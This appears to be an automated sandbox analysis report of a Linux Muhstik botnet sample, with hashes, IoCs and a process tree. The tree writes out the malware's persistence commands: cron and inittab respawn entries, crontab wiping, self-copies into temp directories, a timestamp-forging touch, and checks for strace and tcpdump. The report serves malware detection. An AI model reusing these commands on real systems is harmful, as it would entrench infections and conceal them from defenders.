Analysis
-
max time kernel
11949s -
max time network
154s -
platform
linux_amd64 -
resource
ubuntu1804-amd64-en-20211208 -
submitted
25-04-2022 23:53
Static task
static1
Behavioral task
behavioral1
Sample
pty4pimkkvvs
Resource
ubuntu1804-amd64-en-20211208
0 signatures
0 seconds
General
-
Target
pty4pimkkvvs
-
Size
90KB
-
MD5
60f50372901a3ab6be093cb9922fd75c
-
SHA1
03fabbbc736a5c59b889e3675331c96263d4a4a6
-
SHA256
16b4093813e2923e9ee70b888f0d50f972ac607253b00f25e4be44993d263bd2
-
SHA512
480ce401e171d29483b5ddf2b732f8959daba11c8b25538d179cc93795594676aaec3ae078cd312743a9cecf78ba533a58ced339fa63e2b5e53b9077933d0e6b
Score
10/10
Malware Config
Signatures
-
suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity
suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity
-
Reads runtime system information 4 IoCs
Reads data from /proc virtual filesystem.
Processes:
cpcpcpcpdescription ioc process /proc/filesystems /proc/filesystems cp /proc/filesystems /proc/filesystems cp /proc/filesystems /proc/filesystems cp /proc/filesystems /proc/filesystems cp -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
cpcpcpcpdescription ioc process /tmp/pty4pimkkvvs /tmp/pty4pimkkvvs cp /tmp/pty4pimkkvvs /tmp/pty4pimkkvvs cp /tmp/pty4pimkkvvs /tmp/pty4pimkkvvs cp /tmp/pty4pimkkvvs /tmp/pty4pimkkvvs cp
Processes
-
./pty4pimkkvvs./pty4pimkkvvs1⤵PID:570
-
/bin/shsh -c "pidof -x strace > /dev/null"1⤵PID:571
-
/bin/pidofpidof -x strace2⤵PID:572
-
-
/bin/shsh -c "pidof -x tcpdump > /dev/null"1⤵PID:573
-
/bin/pidofpidof -x tcpdump2⤵PID:574
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/tmp/pty4pimkkvvs\" > /etc/inittab2"1⤵PID:577
-
/bin/catcat /etc/inittab2⤵PID:579
-
-
/bin/grepgrep -v /tmp/pty4pimkkvvs2⤵PID:582
-
-
/bin/shsh -c "crontab -l | grep /tmp/pty4pimkkvvs | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty4pimkkvvs > /dev/null 2>&1 &\") | crontab -"1⤵PID:578
-
/usr/bin/crontabcrontab -l2⤵PID:581
-
-
/bin/grepgrep /tmp/pty4pimkkvvs2⤵PID:584
-
-
/bin/grepgrep -v "no cron"2⤵PID:585
-
-
/usr/bin/crontabcrontab -2⤵PID:588
-
-
/bin/shsh -c "crontab -r"1⤵PID:580
-
/usr/bin/crontabcrontab -r2⤵PID:583
-
-
/bin/shsh -c "echo \"0:2345:respawn:/tmp/pty4pimkkvvs\" >> /etc/inittab2"1⤵PID:586
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:589
-
/bin/catcat /etc/inittab22⤵PID:591
-
-
/usr/bin/crontabcrontab -l1⤵PID:590
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:592
-
/bin/rmrm -rf /etc/inittab22⤵PID:593
-
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:594
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:595
-
-
/bin/shsh -c "/bin/uname -n"1⤵PID:602
-
/bin/uname/bin/uname -n2⤵PID:604
-
-
/bin/shsh -c "cp -f /tmp/pty4pimkkvvs /dev/shm/pty4pimkkvvs"1⤵PID:603
-
/bin/cpcp -f /tmp/pty4pimkkvvs /dev/shm/pty4pimkkvvs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:605
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/dev/shm/pty4pimkkvvs\" > /etc/inittab2"1⤵PID:607
-
/bin/catcat /etc/inittab2⤵PID:609
-
-
/bin/grepgrep -v /dev/shm/pty4pimkkvvs2⤵PID:610
-
-
/bin/shsh -c "crontab -l | grep /dev/shm/pty4pimkkvvs | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty4pimkkvvs > /dev/null 2>&1 &\") | crontab -"1⤵PID:608
-
/usr/bin/crontabcrontab -l2⤵PID:611
-
-
/bin/grepgrep /dev/shm/pty4pimkkvvs2⤵PID:612
-
-
/bin/grepgrep -v "no cron"2⤵PID:613
-
-
/usr/bin/crontabcrontab -2⤵PID:616
-
-
/bin/shsh -c "echo \"0:2345:respawn:/dev/shm/pty4pimkkvvs\" >> /etc/inittab2"1⤵PID:614
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:617
-
/bin/catcat /etc/inittab22⤵PID:619
-
-
/usr/bin/crontabcrontab -l1⤵PID:618
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:620
-
/bin/rmrm -rf /etc/inittab22⤵PID:621
-
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:622
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:623
-
-
/bin/shsh -c "cp -f /tmp/pty4pimkkvvs /var/tmp/pty4pimkkvvs"1⤵PID:624
-
/bin/cpcp -f /tmp/pty4pimkkvvs /var/tmp/pty4pimkkvvs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:625
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/tmp/pty4pimkkvvs\" > /etc/inittab2"1⤵PID:627
-
/bin/catcat /etc/inittab2⤵PID:628
-
-
/bin/grepgrep -v /var/tmp/pty4pimkkvvs2⤵PID:630
-
-
/bin/shsh -c "crontab -l | grep /var/tmp/pty4pimkkvvs | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty4pimkkvvs > /dev/null 2>&1 &\") | crontab -"1⤵PID:629
-
/usr/bin/crontabcrontab -l2⤵PID:631
-
-
/bin/grepgrep /var/tmp/pty4pimkkvvs2⤵PID:632
-
-
/bin/grepgrep -v "no cron"2⤵PID:633
-
-
/usr/bin/crontabcrontab -2⤵PID:636
-
-
/bin/shsh -c "echo \"0:2345:respawn:/var/tmp/pty4pimkkvvs\" >> /etc/inittab2"1⤵PID:634
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:637
-
/bin/catcat /etc/inittab22⤵PID:639
-
-
/usr/bin/crontabcrontab -l1⤵PID:638
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:640
-
/bin/rmrm -rf /etc/inittab22⤵PID:641
-
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:642
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:643
-
-
/bin/shsh -c "cp -f /tmp/pty4pimkkvvs /var/lock/pty4pimkkvvs"1⤵PID:644
-
/bin/cpcp -f /tmp/pty4pimkkvvs /var/lock/pty4pimkkvvs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:645
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/lock/pty4pimkkvvs\" > /etc/inittab2"1⤵PID:647
-
/bin/catcat /etc/inittab2⤵PID:648
-
-
/bin/grepgrep -v /var/lock/pty4pimkkvvs2⤵PID:650
-
-
/bin/shsh -c "crontab -l | grep /var/lock/pty4pimkkvvs | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty4pimkkvvs > /dev/null 2>&1 &\") | crontab -"1⤵PID:649
-
/usr/bin/crontabcrontab -l2⤵PID:651
-
-
/bin/grepgrep /var/lock/pty4pimkkvvs2⤵PID:653
-
-
/bin/grepgrep -v "no cron"2⤵PID:654
-
-
/usr/bin/crontabcrontab -2⤵PID:658
-
-
/bin/shsh -c "echo \"0:2345:respawn:/var/lock/pty4pimkkvvs\" >> /etc/inittab2"1⤵PID:652
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:655
-
/bin/catcat /etc/inittab22⤵PID:657
-
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:660
-
/bin/rmrm -rf /etc/inittab22⤵PID:661
-
-
/usr/bin/crontabcrontab -l1⤵PID:659
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:662
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:663
-
-
/bin/shsh -c "cp -f /tmp/pty4pimkkvvs /var/run/pty4pimkkvvs"1⤵PID:664
-
/bin/cpcp -f /tmp/pty4pimkkvvs /var/run/pty4pimkkvvs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:665
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/run/pty4pimkkvvs\" > /etc/inittab2"1⤵PID:667
-
/bin/grepgrep -v /var/run/pty4pimkkvvs2⤵PID:670
-
-
/bin/catcat /etc/inittab2⤵PID:669
-
-
/bin/shsh -c "crontab -l | grep /var/run/pty4pimkkvvs | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty4pimkkvvs > /dev/null 2>&1 &\") | crontab -"1⤵PID:668
-
/usr/bin/crontabcrontab -l2⤵PID:671
-
-
/bin/grepgrep /var/run/pty4pimkkvvs2⤵PID:672
-
-
/bin/grepgrep -v "no cron"2⤵PID:673
-
-
/usr/bin/crontabcrontab -2⤵PID:677
-
-
/bin/shsh -c "echo \"0:2345:respawn:/var/run/pty4pimkkvvs\" >> /etc/inittab2"1⤵PID:674
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:675
-
/bin/catcat /etc/inittab22⤵PID:678
-
-
/usr/bin/crontabcrontab -l1⤵PID:679
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:680
-
/bin/rmrm -rf /etc/inittab22⤵PID:681
-
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:682
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:683
-